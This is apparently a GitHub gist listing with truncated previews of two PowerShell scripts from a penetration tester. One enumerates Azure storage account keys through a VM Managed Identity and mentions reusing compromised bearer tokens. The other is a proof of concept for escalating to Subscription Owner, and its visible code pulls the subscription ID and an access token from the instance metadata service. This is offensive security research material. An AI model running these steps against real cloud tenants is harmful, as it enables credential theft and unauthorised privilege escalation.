@kfosaaen
kfosaaen / get-MIStorageKeys.ps1
Last active Jan 25, 2021
A PowerShell function to call Azure REST APIs using a VM Managed Identity to list available Storage Account access keys
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
@kfosaaen
kfosaaen / MI-Owner-Escalation.ps1
Created Feb 14, 2020
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token